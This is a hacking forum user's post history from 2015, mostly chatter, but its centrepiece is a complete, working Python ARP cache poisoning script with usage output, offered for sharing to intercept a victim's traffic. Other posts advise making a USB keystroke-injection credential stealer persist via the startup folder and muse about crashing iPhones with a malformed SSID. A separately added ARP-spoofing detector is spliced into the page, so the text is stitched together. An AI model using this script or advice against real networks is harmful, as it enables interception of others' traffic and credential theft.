Messages - techb

16
General discussion / Re: Your vote counts
« on: June 06, 2015, 07:31:11 am »
Well shit.

17
Web Oriented Programming / Re: Please don't hunt me down and kill me
« on: June 06, 2015, 06:32:00 am »
That has sorted it, thank you Rytiou..

Can I ask though please, with regards to your response (point number three); is there not an easier way to align the text exactly to the middle of the image, without having to manually adjust the margins? i.e left: 50px; top 50px etc.. Not only is this time consuming and code heavy, it is not entirely accurate?

Mugman

Uhhh.. center. Please post this kind of thing on sites that accept it like Stackoverflow or Daniweb. Rytiou was kind in giving you an answer, but this is NOT the site to post such questions. If it is about hacking then sure maybe, but this is simple homework help kinda shit and is not welcome here. There are plenty of sites like daniweb and stackoverflow to help with such things.

Locked because it should just not be in this forum, also locked and not removed since an answer is given and maybe someone else might see this before posting such questions.

19
Hacking and Security / Re: Gmail: New sign-in from...
« on: June 02, 2015, 03:15:41 pm »
I think they should send an SMS alert to the registered number & a mail to the alternative email or recovery email

because an attacker can easily delete the email

I would drop gmail as an email provider if they switched to something like facebook does. Just no.

20
Feedback / Re: The Noob Invasion.
« on: June 02, 2015, 03:08:48 pm »
The noob plague is nothing new. You've only been a member for about a year now. This has been happening since forums or bboards were a thing in general back in the late 80s and early 90s. Just get used to it, it won't go away.

I have noticed though that the influx of member intros usually coincides with beginning and ending school year/semester times. American school year anyway. Sometimes we get influxes in registration and shit where you see like 5 to 10 or more people join right around the same time. You can attribute it to friends telling friends about this "cool new hacking site" they just found, or even teachers linking here.

You rarely see me post in such threads anymore. Only when I see some lols I can have or of the such. Hides grow thick with time. I'm not really an oldfag, but I know who my friends are, and I know enough about ez to understand 'n00bz'.

The real thing we need to worry about is the people actually wanting to learn something. We all start somewhere, and this is a great place to start if you can lurk long enough to learn.

21
Members introduction / Re: printf("Hello, evilzone\n")
« on: June 02, 2015, 12:57:40 pm »


As for MitM via ARP poisoning, I just recently posted a tutorial on doing it with python 2 different ways.

Tutorial
https://evilzone.org/tutorials/arp-cache-poisen-via-python/
Raw sockets example
https://evilzone.org/scripting-languages/%28python%29arp-poison-using-raw-sockets/

22
Members introduction / Re: My curiosity of computers brought me here
« on: June 02, 2015, 12:14:10 pm »
Your avatar looks like the Hamburglar from McDonalds grew a beard. I know it is supposed to be the Joker, but when I look at it I want a big mac.

23
Scripting languages / Re: [python]ARP poison using raw sockets
« on: June 01, 2015, 01:46:23 pm »
Bump. I figured it out. I explain it in the original post, the code is working now.

24
Scripting languages / [python]ARP poison using raw sockets
« on: May 31, 2015, 06:35:16 am »
This is a script to poison the ARP table using raw sockets. It requires Linux, and specifically Linux 2.0 or greater. Windows simply cannot do this with this script. This is an example of building packets by hand in binary form and sending to the driver at Layer 2 (network), skipping Layer 3 (ip) altogether using PF_PACKET and raw sockets.

=-=-=-EDIT-=-=-=

The code is working now. The reason it wasn't before was because of using .upper() on the mac address conversions.
Code: [Select]
binascii.unhexlify(''.join(vmac.split(':'))).upper()

It was applying the upper method to the binary string. I removed it and it is working. With further testing I found out the mac address could use upper case or lower case hex chars, but have converted them to lower case before converting to binary form. Only because I plan on extending the script and want consistency. I/you can make them upper case before the conversion, but with error testing it is easier to read in lower case for me.

Anyway, code is working like a charm now. Usage:
Code: [Select]
[techb@techb_media Python]$ sudo python2 arpraw.py -h
usage: arpraw.py [-h] -vm VICTIMMAC -vi VICTIMIP -tm TARGETMAC -ti TARGETIP
                 [-d DELAY]

ARP poison using raw sockets

optional arguments:
  -h, --help            show this help message and exit
  -vm VICTIMMAC, --victimmac VICTIMMAC
                        Victim MAC address
  -vi VICTIMIP, --victimip VICTIMIP
                        Victim IP address
  -tm TARGETMAC, --targetmac TARGETMAC
                        Target MAC address [gateway]
  -ti TARGETIP, --targetip TARGETIP
                        Target IP address [gateway]
  -d DELAY, --delay DELAY
                        Delay in seconds between sending packets [optional]

Code: Python
#! /usr/bin/python2

# ARP poison example using raw packets
#   instead of scapy. Note that this is
#   very noisy. Any half brained admin
#   would notice the arp activity.
# victim == the computer we want to sniff
# target == default gateway (in most cases)
# Written by: techb
# Date: May 28 2015
# Python: Version 2.7
# OS dev on: Arch Linux
# License: None, script is public domain,  but at
#   least credit me if you share this.
# This script is presented 'as is' and the author
#   is not responsible for misuse or errors you may get.

import binascii
import socket
import time
import argparse

def getInterfaces():
        '''This function is not used here, but if you
           don't know what interface you want to use
           or the name of it. Since I'm on Arch they
           decided it would be a good idea to make simple
           interface names all fuckey '''
        # NEVER import inside a function or method
        # I put it here in case you used the function
        #   to show you need these libs for it.
        import os, re
        raw = os.popen("ip link show").read()
        interface = re.findall(r"\d: \w+:", raw)
        ilist = []
        for i in interface:
                ilist.append(i[:-1])
        return ilist

def getOwnMac(interface):
        '''Uhhhh, gets my own mac address.'''
        fd = open("/sys/class/net/%s/address" % interface , "r")
        mac = fd.read()
        fd.close()
        return mac.strip()

def buildPoison(victim, target, mymac):
    '''builds the custom packet used to poison
      the arp cache. Arguments should be tuples
      containing the ip and mac. (ip, mac)'''
    vip = victim[0]
    vmac = victim[1].lower()
    tip = target[0]
    tmac = target[1].lower()

    # create binary values to be sent on wire
    # the mac addr conversions are very ugly but work =)
    vip = socket.inet_aton(vip)
    vmac = binascii.unhexlify(''.join(vmac.split(':')))
    tip = socket.inet_aton(tip)
    tmac = binascii.unhexlify(''.join(tmac.split(':')))
    mymac = binascii.unhexlify(''.join(mymac.split(':')))

    # build ethernet headers
    pcode = '\x08\x06' #ARP code for eth header
    veth = vmac+mymac+pcode
    teth = tmac+mymac+pcode

    # build arp headers
    htype = '\x00\x01' # we're on ethernet
    proto = '\x08\x00' # intended protocol, which is ipv4
    hsize = '\x06' # mac addr size
    psize = '\x04' # ip addr size
    opcode = '\x00\x02' # arp option code, 2 is reply
    arp = htype+proto+hsize+psize+opcode

    # build spoofed portion of arp header
    vspoof = mymac+tip+vmac+vip # victim
    tspoof = mymac+vip+tmac+tip # target

    # build final packets
    vpacket = veth+arp+vspoof
    tpacket = teth+arp+tspoof

    return (vpacket, tpacket)

def main(v_mac, t_mac, delay=2):
    '''Main loop. Can pass a delay argument, defaults to 2 seconds.'''
    interface = 'enp2s0' #yours will probably be diff
    my_mac = getOwnMac(interface)
    s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, socket.ntohs(0x0800))
    s.bind((interface, socket.htons(0x0800)))
    packets = buildPoison(v_mac, t_mac, my_mac)
    print "Poisoning..."
    while True:
        s.send(packets[0])
        s.send(packets[1])
        time.sleep(delay)

if __name__ == '__main__':
    ap = argparse.ArgumentParser(description="ARP poison using raw sockets")
    ap.add_argument("-vm", "--victimmac", help="Victim MAC address", required=True)
    ap.add_argument("-vi", "--victimip", help="Victim IP address", required=True)
    ap.add_argument("-tm", "--targetmac", help="Target MAC address [gateway]", required=True)
    ap.add_argument("-ti", "--targetip", help="Target IP address [gateway]", required=True)
    ap.add_argument("-d", "--delay", help="Delay in seconds between sending packets [optional]", type=float)
    args = ap.parse_args()

    if args.delay:
        main((args.victimip, args.victimmac), (args.targetip, args.targetmac), delay=args.delay)
    else:
        main((args.victimip, args.victimmac), (args.targetip, args.targetmac))
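The script's own header comment calls this traffic very noisy; the following added example (Python 3, not part of the original post or techb's code) shows what a monitor sees in it by parsing the same Ethernet/ARP byte layout and flagging an IP whose MAC changes and a MAC that claims several IPs. The names `parse_arp`, `ArpWatch`, `_frame` and `run_sample`, and the sample addresses, are assumptions constructed for the illustration.

```python
import socket
import struct
ETH_ARP = 0x0806

def parse_arp(frame):
    """Return (opcode, sender_mac, sender_ip) for an Ethernet/IPv4 ARP frame, else None."""
    if len(frame) < 42:                      # 14-byte Ethernet header + 28-byte ARP body
        return None
    etype, htype, ptype, hlen, plen, op = struct.unpack("!HHHBBH", frame[12:22])
    if (etype, htype, ptype, hlen, plen) != (ETH_ARP, 1, 0x0800, 6, 4):
        return None
    sha, spa = struct.unpack("!6s4s", frame[22:32])
    return op, ":".join("%02x" % b for b in sha), socket.inet_ntoa(spa)

class ArpWatch:
    """Tracks IP->MAC bindings and reports two signs of cache poisoning."""
    def __init__(self):
        self.ip_to_mac, self.mac_to_ips = {}, {}

    def observe(self, frame):
        parsed = parse_arp(frame)
        if parsed is None:
            return []
        _, mac, ip = parsed
        alerts = []
        known = self.ip_to_mac.setdefault(ip, mac)   # first binding seen is kept
        if known != mac:
            alerts.append("binding-change %s: %s -> %s" % (ip, known, mac))
        ips = self.mac_to_ips.setdefault(mac, set())
        ips.add(ip)
        if len(ips) > 1:                             # one station answering for many IPs
            alerts.append("mac-claims-multiple-ips %s: %s" % (mac, sorted(ips)))
        return alerts

def _frame(dst, sha, spa, tha, tpa, op=2):   # constructed test frame, op 2 = reply
    m = lambda s: bytes.fromhex(s.replace(":", ""))
    return (m(dst) + m(sha) + struct.pack("!HHHBBH", ETH_ARP, 1, 0x0800, 6, 4, op)
            + m(sha) + socket.inet_aton(spa) + m(tha) + socket.inet_aton(tpa))

GW, HOST, ODD = "02:00:00:00:00:01", "02:00:00:00:00:10", "02:00:00:00:00:66"
SAMPLE = [  # constructed capture: two honest replies, then two conflicting ones
    _frame(HOST, GW, "192.0.2.1", HOST, "192.0.2.10"),
    _frame(GW, HOST, "192.0.2.10", GW, "192.0.2.1"),
    _frame(HOST, ODD, "192.0.2.1", HOST, "192.0.2.10"),
    _frame(GW, ODD, "192.0.2.10", GW, "192.0.2.1"),
]

def run_sample():
    watch = ArpWatch()
    return [alert for frame in SAMPLE for alert in watch.observe(frame)]
```

On a live network the bindings would be seeded from DHCP leases or static entries rather than first-seen traffic, since a first-seen table trusts whoever answers first.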

25
Scripting languages / Re: [DUCKY] DeepCopy Ducky Stealer v1.0 (WIP)
« on: May 31, 2015, 06:05:31 am »
Honestly, I think going the vbs route would be better all around. More flexibility and could have it put it in the startup folder. Or just write your own code and compile it and just have the ducky copy it over and run it. The ducky script would still be useful to cd into a temp dir and go from there. Have your own code do the heavy lifting.

26
Hacking and Security / Re: Is hacking a mentality or skillset?
« on: May 29, 2015, 01:57:07 pm »
Oh for fuck sake really? Has this question not been answered not a couple of weeks ago on this forum? Let alone the Internet constantly?
[snip]

Welcome to the internet.

27
Members introduction / Re: System.out.println("Hello EvilZone");
« on: May 28, 2015, 02:08:56 pm »
Aaaaaaannnnndddddd he's gone. I think we should remove member intros after like a month or so.

28
Found it on the Webs / Re: iPhone Crash / Reboot Exploit
« on: May 28, 2015, 01:18:15 pm »
Actually it's been around a while. It crashes because Apple doesn't agree with Unicode.
Edit: To clarify it is a bug, Apple isn't just being stubborn. I wouldn't put it past them to try to create a brand new format though.

You mean create a whole new phone to sell for 400% markup lol.

Interesting I wish I had an iPhone handy. Would be fun to test the ssid. Make portable routers to crash any iPhone looking for wifi

I don't own an iPhone, but from what it sounds like, only happening with the notifications, an open access point with the unicode ssid might not work. Unless the ssid is in the notification maybe? Idk, would be cool to test out though.

29
Mobile Hacking / Re: Smartphone that supports monitor mode?
« on: May 27, 2015, 01:12:39 pm »
OR you could get a raspberry pi and use that. Would need to add a gsm radio to make it technically a phone if you really needed it, but meh.

30
Programming newbies / Re: Starting programming?
« on: May 27, 2015, 01:00:54 pm »
If you want to be lazy AND learn, then hop on youtube and watch computer science or software lectures. MIT and Stanford have complete semesters uploaded as open courseware.
